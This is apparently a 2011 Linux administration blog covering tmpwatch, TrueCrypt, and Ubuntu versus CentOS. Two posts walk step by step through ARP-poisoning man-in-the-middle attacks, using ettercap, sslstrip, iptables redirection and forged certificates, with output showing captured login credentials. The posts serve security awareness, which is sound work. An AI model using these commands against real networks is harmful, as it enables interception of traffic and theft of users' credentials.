Nov 29, 2011

The tmp directory and tmpwatch daemon

The tmp directory is normally used on Linux systems by users and applications to store temporary data.

On Debian or Ubuntu distributions, the system cleans out /tmp at each startup. On RHEL or CentOS 6, no operation is performed on that directory by default. But in version 5 of RHEL or CentOS, a great tool was installed on the system by default and used to periodically check the contents of the tmp directory: tmpwatch.

Tmpwatch is run from a daily cron job and takes care of removing files which have not been accessed for a period of time, or any file or folder that you configure. This operation is carried out based on criteria which will be explained below. The equivalent program on Debian/Ubuntu is tmpreaper, although you can also compile tmpwatch for those distributions without any problem.
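If you are running Debian or Ubuntu and want the same behavior, tmpreaper is available in the official repositories (the prompt below is just illustrative):

root@debian:~# aptitude install tmpreaper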

For this article, I am going to use CentOS 6.0 (32-bit).

[root@centos ~]# yum install tmpwatch

[root@centos ~]# cat /etc/cron.daily/tmpwatch 
#! /bin/sh
flags=-umc
/usr/sbin/tmpwatch "$flags" -x /tmp/.X11-unix -x /tmp/.XIM-unix \
        -x /tmp/.font-unix -x /tmp/.ICE-unix -x /tmp/.Test-unix \
        -X '/tmp/hsperfdata_*' 10d /tmp
/usr/sbin/tmpwatch "$flags" 30d /var/tmp
for d in /var/{cache/man,catman}/{cat?,X11R6/cat?,local/cat?}; do
    if [ -d "$d" ]; then
        /usr/sbin/tmpwatch "$flags" -f 30d "$d"
    fi
done

By taking a look at the script launched daily by the system, we can see that tmpwatch clears out the contents of a series of directories (/tmp, /var/tmp, /var/cache/man, etc.). Files are removed when none of certain timestamps have been updated within the last 10 days (/tmp) or 30 days (the rest). The flags used in the script are the following:

  • -u (--atime): the decision to delete a file depends on its atime (access time).
  • -m (--mtime): the decision to delete a file depends on its mtime (modification time).
  • -c (--ctime): the decision to delete a file depends on its ctime (inode change time).
  • -f (--force): removes files even if root does not have write access.

By means of the '-x' option, we can exclude a specific file or directory, while '-X' excludes any path that matches a shell pattern.
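Before letting tmpwatch loose on a directory, you can rehearse the deletion with its test mode (-t or --test), which only prints what would be removed without deleting anything. A minimal sketch using the same flags as the cron job:

[root@centos ~]# /usr/sbin/tmpwatch -umc --test 10d /tmp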


Nov 22, 2011

TrueCrypt under the command line

I have an external hard drive (LG XD3, 500 GB) split into two partitions of 450 GB and 50 GB. The first partition is public and formatted with NTFS. The second one is formatted with ext4 and encrypted by means of TrueCrypt; it is where I store my private data.

So far, I had used TrueCrypt in graphical mode, but over time I have realized that the command-line version is more comfortable to handle (besides, I tend to rule out graphical tools whenever possible).

TrueCrypt is a powerful program which can encrypt partitions, logical volumes, whole hard drives or even installed operating systems. The encryption is carried out transparently and automatically, and on top of all that, in real time (that is to say, on the fly). Other pluses are the option to hide volumes and its performance, which is excellent.

One practical detail of TrueCrypt is that it is not necessary to install it on the system. To that end, you have to download the console-only file (in my case, the 32-bit version) and run the downloaded installer. Then, you have to choose the second option: Extract package file truecrypt_7.1_console_i386.tar.gz and place it to /tmp. The TrueCrypt executable is located within this tgz file.

I usually drop this binary file onto the public partition of the external hard drive. Thereby, when I have to use it, I just have to grab it from there.

javi@javi-ubuntu:/tmp$ cp /media/public/truecrypt/truecrypt . ; chmod +x truecrypt

javi@javi-ubuntu:/tmp$ ./truecrypt --version
TrueCrypt 7.1

First of all, I had to encrypt the partition. This is a long process whose duration depends on the size of the partition. Below you can see that the average speed was 26 MB/s.

In the next output, you can see that in order to create the encrypted partition (sdb2), I followed the text wizard provided by TrueCrypt. Another choice would have been to pass the parameters on the command line (--encryption, --size, etc.); a sketch of that is shown after the wizard output.

javi@javi-ubuntu:/tmp$ sudo ./truecrypt -c
Volume type:
 1) Normal
 2) Hidden
Select [1]: 1

Enter volume path: /dev/sdb2

Encryption algorithm:
 1) AES
 2) Serpent
 3) Twofish
 4) AES-Twofish
 5) AES-Twofish-Serpent
 6) Serpent-AES
 7) Serpent-Twofish-AES
 8) Twofish-Serpent
Select [1]: 1

Hash algorithm:
 1) RIPEMD-160
 2) SHA-512
 3) Whirlpool
Select [1]: 1

Filesystem:
 1) None
 2) FAT
 3) Linux Ext2
 4) Linux Ext3
 5) Linux Ext4
Select [2]: 5

Enter password: 
Re-enter password: 

Enter keyfile path [none]: 

Please type at least 320 randomly chosen characters and then press Enter:


Done: 100.000%  Speed:   26 MB/s  Left: 0 s                

The TrueCrypt volume has been successfully created.
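As mentioned above, the same volume could also have been created non-interactively by passing the answers as parameters. The following sketch uses the option names printed by ./truecrypt --help, so double-check them against your version; anything not supplied (such as the password) is still prompted for interactively, which also keeps it out of the shell history:

javi@javi-ubuntu:/tmp$ sudo ./truecrypt -c /dev/sdb2 --volume-type=normal \
        --encryption=AES --hash=RIPEMD-160 --filesystem=ext4 \
        --random-source=/dev/urandom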

Once you have created the encrypted partition (remember that my example is based on a partition, but you can also encrypt a file or logical volume), the procedure is pretty easy. When you want to work with that safe area, you only have to mount it by means of TrueCrypt.

javi@javi-ubuntu:/tmp$ sudo mkdir /mnt/truecrypt

javi@javi-ubuntu:/tmp$ sudo ./truecrypt /dev/sdb2 /mnt/truecrypt
Enter password for /dev/sdb2: 
Enter keyfile [none]: 
Protect hidden volume (if any)? (y=Yes/n=No) [No]:

javi@javi-ubuntu:/tmp$ ./truecrypt --list
1: /dev/sdb2 /dev/mapper/truecrypt1 /mnt/truecrypt

By running the following command, you can obtain more details about a mounted volume.

javi@javi-ubuntu:/tmp$ ./truecrypt --volume-properties /dev/sdb2
Slot: 1
Volume: /dev/sdb2
Virtual Device: /dev/mapper/truecrypt1
Mount Directory: /mnt/truecrypt
Size: 50.0 GB
Type: Normal
Read-Only: No
Hidden Volume Protected: No
Encryption Algorithm: AES
Primary Key Size: 256 bits
Secondary Key Size (XTS Mode): 256 bits
Block Size: 128 bits
Mode of Operation: XTS
PKCS-5 PRF: HMAC-RIPEMD-160
Volume Format Version: 2
Embedded Backup Header: Yes

You can dismount it by executing the following command.

javi@javi-ubuntu:/tmp$ sudo ./truecrypt --dismount /mnt/truecrypt

TrueCrypt has many more command-line options. I invite you to take a look at them by checking its help.

And finally, I would like to conclude this article by writing down the rsync command that I usually run to back up my data to the private partition.

javi@javi-ubuntu:~$ rsync -altgvb --delete /data /mnt/truecrypt/
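If you want to preview the changes before the real run, rsync's -n (--dry-run) option lists what would be copied or deleted without touching anything:

javi@javi-ubuntu:~$ rsync -altgvbn --delete /data /mnt/truecrypt/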


Nov 15, 2011

ARP poisoning (III)

In the first article about ARP poisoning (I), we learnt the danger of connecting to a service by using a non-secure protocol, such as HTTP, FTP, SMTP and so on. The username and password are passed along in the clear, and anyone could sniff them.

Ok, that's right, so we have to use secure protocols (HTTPS, SSH, FTPS, etc.). But what happens if the digital certificate utilized to authenticate and encrypt the communication is changed on the fly? That is just what we studied in the second article about ARP poisoning (II). The bottom line was that we always have to pay attention when we load a webpage, and we must only accept a trusted certificate.

What would happen if one day we are a little bit asleep and do not realize that we are using HTTP rather than HTTPS? What? How is it possible that I am logging in to my bank account and that access is not provided through HTTPS? Well, you had better believe it.

Below you can take a look at the normal login on the Oracle website, in both Firefox and Google Chrome. You may observe that both accesses are correctly served by means of HTTPS.




Imagine for a moment that an intruder carries out a poisoning attack between you and the router, in order to intercept all transmitted data. Then, he sets up a tool like sslstrip to establish two TCP communications: on the one hand, an HTTPS connection between him and the Oracle web, using the real certificate offered by Oracle, and on the other, an HTTP connection between him and you. This is the goal of sslstrip: to take advantage of a Man-in-the-Middle (MitM) attack for tapping SSL/TLS conversations.

root@attacker:~# aptitude install sslstrip

root@attacker:~# iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-ports 10000
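Depending on the environment, you may also need to enable IP forwarding on the attacker's machine so that the victim's traffic keeps flowing towards the router (some setups take care of the forwarding themselves, so treat this as an assumption to verify):

root@attacker:~# echo 1 > /proc/sys/net/ipv4/ip_forward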

root@attacker:~# sslstrip -w victim.log
sslstrip 0.9 by Moxie Marlinspike running...

root@attacker:~# ettercap -TqM arp:remote /192.168.1.1/ /192.168.1.10/

After running ettercap and redirecting all HTTP traffic to port 10000 (the default port used by sslstrip), if the victim tries to open the aforementioned HTTPS Oracle web page, the HTTP version of the site will turn up (sslstrip takes care of transforming the content sent out by Oracle and serves it to the victim over an HTTP session).

The following figures show the manipulated web page created by sslstrip.




If the victim attempts to sign in, the credentials will be captured by the attacker.

root@attacker:~# cat victim.log
...
2011-11-05 19:51:47,876 POST Data (login.oracle.com):
...
AD91DC75E382F4E9ACDC66D839F095558488AA1754EB29D4513F832B83CB31BF05DB93ACCC18255184E5296825625A56EA6&locale=&ssousername=test%40mytest.com&password=test2

Ok, perfect, so to steer clear of this kind of attack, first of all, we must have a good cup of coffee every morning, ;-), and second, be very careful when we surf the Internet. At any rate, as mentioned in the first post, the aim of this series of articles is to present, later on, a great tool which will help us to shut out this sort of problem.

Carrying on with sslstrip, it still holds one last trick: it is able to draw a padlock icon (as the favicon) in the navigation bar.

root@attacker:~# sslstrip -f -w victim.log
sslstrip 0.9 by Moxie Marlinspike running...

You can take a look at it in both browsers.




It is very important to underline the risks of this type of attack. You could check it out with hundreds of websites (banks, e-commerce, sports betting, etc.) and on most of them, you could be spoofed. But I have also seen that there are other sites, such as PayPal, where the altered web page does not work out very well.


Nov 8, 2011

Ubuntu Server instead of CentOS?

Although both are outstanding Linux distributions, nowadays I choose Ubuntu Server. For a long time, I preferred CentOS over Ubuntu Server, but today, I always install Ubuntu Server unless there is some requirement which forces me to do the opposite (for instance, when some application is only supported on CentOS/RHEL).

I am not going to focus on details such as performance, architecture, support and so on. I only want to talk about those simple things that, when I finish the installation of an operating system, make me say: I like it!

For my tests, I am going to use two similar versions: Ubuntu Server 10.04 LTS and CentOS 6.0, both 32-bit. After the initial installation (and the corresponding upgrades), here is a typical view of the system status. As you can see, Ubuntu Server grabs little memory, since most of what it uses is cache. With respect to the number of active processes, it also has fewer than CentOS.

root@ubuntu-server:~# top
top - 12:17:54 up 13 min,  1 user,  load average: 0.00, 0.00, 0.00
Tasks:  78 total,   1 running,  77 sleeping,   0 stopped,   0 zombie
Cpu(s):  0.0%us,  0.0%sy,  0.0%ni,100.0%id,  0.0%wa,  0.0%hi,  0.0%si,  0.0%st
Mem:   2061260k total,   126644k used,  1934616k free,    17088k buffers
Swap:   565240k total,        0k used,   565240k free,    87796k cached
...

[root@centos ~]# top
top - 12:17:49 up 13 min,  1 user,  load average: 0.00, 0.00, 0.00
Tasks:  84 total,   1 running,  83 sleeping,   0 stopped,   0 zombie
Cpu(s):  0.0%us,  0.0%sy,  0.0%ni,100.0%id,  0.0%wa,  0.0%hi,  0.0%si,  0.0%st
Mem:   2071620k total,    99020k used,  1972600k free,     5272k buffers
Swap:  4161528k total,        0k used,  4161528k free,    29488k cached
...

What about the initial space taken up by the installation? (In order to get a more accurate result, I have cleaned the package cache.) As you can see, CentOS occupies around 225 MB less than Ubuntu Server. I have to highlight this point, because this aspect has improved a lot in CentOS 6.0, since we now have a minimal installation option. With CentOS 5, the final size was bigger.

root@ubuntu-server:~# aptitude clean

root@ubuntu-server:~# df -h
Filesystem            Size  Used Avail Use% Mounted on
/dev/mapper/ubuntu--server-root
                       12G  888M  9.6G   9% /
none                 1002M  172K 1002M   1% /dev
none                 1007M     0 1007M   0% /dev/shm
none                 1007M   32K 1007M   1% /var/run
none                 1007M     0 1007M   0% /var/lock
none                 1007M     0 1007M   0% /lib/init/rw
/dev/sda1             228M   31M  185M  15% /boot

[root@centos ~]# yum clean all

[root@centos ~]# df -h
Filesystem            Size  Used Avail Use% Mounted on
/dev/mapper/vg_centos-lv_root
                      7.5G  664M  6.4G  10% /
tmpfs                1012M     0 1012M   0% /dev/shm
/dev/sda1             485M   56M  404M  13% /boot

This situation is reflected as well when we take a look at the number of packages installed on the system.

root@ubuntu-server:~# dpkg -l | grep ii | wc -l
358

[root@centos ~]# yum list installed | wc -l
234

Let's move on to the services which are listening on the system right after installation. You may appreciate that the picture on Ubuntu Server is impeccable: there is no process bound to any port (aside from SSH). But what happens with CentOS? Several applications have already been started up (TCP and UDP). This is a waste of time for me, because at the end of each CentOS installation, I have to remove them (a sketch of that cleanup follows the two outputs below).

root@ubuntu-server:~# netstat -nltup
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      810/sshd        
tcp6       0      0 :::22                   :::*                    LISTEN      810/sshd 

[root@centos ~]# netstat -nltup
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address               Foreign Address             State       PID/Program name   
tcp        0      0 0.0.0.0:111                 0.0.0.0:*                   LISTEN      1071/rpcbind        
tcp        0      0 0.0.0.0:22                  0.0.0.0:*                   LISTEN      1191/sshd           
tcp        0      0 0.0.0.0:44568               0.0.0.0:*                   LISTEN      1089/rpc.statd      
tcp        0      0 :::111                      :::*                        LISTEN      1071/rpcbind        
tcp        0      0 :::55445                    :::*                        LISTEN      1089/rpc.statd      
tcp        0      0 :::22                       :::*                        LISTEN      1191/sshd           
udp        0      0 0.0.0.0:822                 0.0.0.0:*                               1071/rpcbind        
udp        0      0 0.0.0.0:841                 0.0.0.0:*                               1089/rpc.statd      
udp        0      0 0.0.0.0:45143               0.0.0.0:*                               1089/rpc.statd      
udp        0      0 0.0.0.0:111                 0.0.0.0:*                               1071/rpcbind        
udp        0      0 :::822                      :::*                                    1071/rpcbind        
udp        0      0 :::43338                    :::*                                    1089/rpc.statd      
udp        0      0 :::111                      :::*                                    1071/rpcbind 
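For instance, on CentOS 6 rpc.statd is started by the nfslock service, so a first cleanup could look like the following sketch (adapt the list to the services you really do not need):

[root@centos ~]# service nfslock stop ; service rpcbind stop
[root@centos ~]# chkconfig nfslock off ; chkconfig rpcbind off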

Regarding the repositories provided by each distribution, Ubuntu Server supplies a larger number of packages than CentOS, and this is another plus. Although you can add excellent additional repositories such as EPEL, those extra packages are not officially supported.

root@ubuntu-server:~# apt-cache stats | grep Normal
  Normal packages: 30299

[root@centos ~]# yum list all | wc -l
4595

It is also worth pointing out the life cycle of each distribution. On Ubuntu Server, you get an LTS (Long Term Support) version every two years. In contrast, on CentOS, the first release of the 5 branch was shipped in March 2007 and CentOS 6.0 in July 2011 (more than four years later). What does this mean? Over time, you have to use an operating system where most of the packages, although still supported, are obsolete.

And finally, I have measured the time needed to reboot each system (both use Upstart). This parameter is really important, mainly in production environments. I got 20 seconds on Ubuntu Server and 40 on CentOS.


Nov 2, 2011

ARP poisoning (II)

In the previous article, ARP poisoning (I), you were able to see the risks of using non-secure protocols inside an untrusted network. At any moment, your login credentials can be captured by an intruder without you being aware of it. Note that this situation can be very common when you surf the Internet and visit HTTP websites, or for example, when you log into your MSN account.

So what happens with secure protocols such as HTTPS? That is to say, for instance when you access your online bank account, PayPal, Gmail, LinkedIn and so on. Are you safe? In most cases, that will depend on you.

Let's go over the normal behavior of a secure site like Facebook. If you left-click on facebook.com in the web browser's address bar (once you have opened the site), you will be able to appreciate that the connection to the site is encrypted and verified by DigiCert Inc (a certification authority).




By pressing the More Information button, you can take a look at the features of the digital certificate offered by Facebook. As you can pick out in the first screen, the certificate has been issued by DigiCert Inc to Facebook, and in the second one, that it is backed by a valid certificate hierarchy.




Now we are going to use another audit tool: Ettercap (NG-0.7.3). This program is aimed at sniffing switched LANs, and supports active and passive analysis of many protocols (HTTP, FTP, POP, IMAP, NFS, etc.), even ciphered ones.

In addition, it includes many options for network and host inspection, data injection into established connections, lots of modules loadable at runtime, also known as plugins (arp_cop - report suspicious ARP activity -, dos_attack - run a DoS attack against a victim -, finger - fingerprint a remote host -, etc.), several MitM attacks (ARP poisoning, ICMP redirection, DHCP spoofing and port stealing) and so on.
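As a side note, the ettercap man page documents that you can print the available plugins by passing 'list' as the plugin name (worth verifying on your build):

root@attacker:~# ettercap -P list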

The victim computer is going to open Facebook (HTTPS) in a web browser (Firefox). Therefore, the victim's traffic will go out through the router so as to reach Facebook across the Internet.

Ettercap will be utilized to poison both elements, victim and router, in order to sniff all traffic between them. So how can the attacker capture the password, if it is sent out through the secure channel previously set up? First of all, the traffic between the victim and Facebook does not go directly to the router; instead, it passes through the attacker, who will be picking up all the data.

Thereby, the attacker will establish, on the one hand, an HTTPS connection between himself and Facebook by using the correct certificate issued to Facebook, and on the other, another HTTPS connection between himself and the victim, but this time by means of a fake certificate created on the fly, whose fields are all filled in according to the real certificate presented by Facebook.

Let's get started by editing the configuration file of Ettercap: we keep root privileges (ec_uid/ec_gid set to 0) and enable the iptables commands which perform the TCP redirection at kernel level, needed to handle SSL dissection.

root@attacker:~# aptitude install ettercap

root@attacker:~# cat /etc/etter.conf
...
[privs]
ec_uid = 0                # nobody is the default
ec_gid = 0                # nobody is the default
...
   redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
   redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
...

Now we are ready to run Ettercap, spoofing both targets and activating the ARP poisoning MitM attack. The 'remote' parameter is set in order to capture the connections which pass through the router; otherwise, only the connections between the two hosts themselves would be captured.

root@attacker:~# ettercap -TqM arp:remote /192.168.1.1/ /192.168.1.10/

ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA

Listening on eth0... (Ethernet)

  eth0 ->       00:0C:29:20:9F:9B      192.168.1.20     255.255.255.0

Privileges dropped to UID 0 GID 0...

  28 plugins
  39 protocol dissectors
  53 ports monitored
7587 mac vendor fingerprint
1698 tcp OS fingerprint
2183 known services

Scanning for merged targets (2 hosts)...

* |==================================================>| 100.00 %

2 hosts added to the hosts list...

ARP poisoning victims:

 GROUP 1 : 192.168.1.1 00:60:B3:50:AB:45

 GROUP 2 : 192.168.1.10 00:0C:29:69:81:47
Starting Unified sniffing...


Text only Interface activated...
Hit 'h' for inline help


At this moment, if you open Facebook again, Firefox will warn you that it cannot confirm that the connection is secure. Normally, when you try to connect securely, sites such as banks, stores, public institutions, etc., present trusted identification to prove that you are going to the right place.




If you confirm the security exception and accept the digital certificate, you will have fallen into the attacker's trap. Let's review the characteristics of this invalid certificate, so as to be able to compare it with the real certificate (second figure).




As you can make out in the general features of the fake certificate, only the fingerprints are modified, because the attacker has signed it with his own private key. Besides, the untrusted certificate does not present a correct hierarchy.

Now, if you attempt to log in to Facebook, your credentials will be captured by the attacker.

root@attacker:~# ettercap -TqM arp:remote /192.168.1.1/ /192.168.1.10/
...

Text only Interface activated...
Hit 'h' for inline help

HTTP : 69.171.224.39:443 -> USER: test@mytest.com  PASS: test1  INFO: https://www.facebook.com/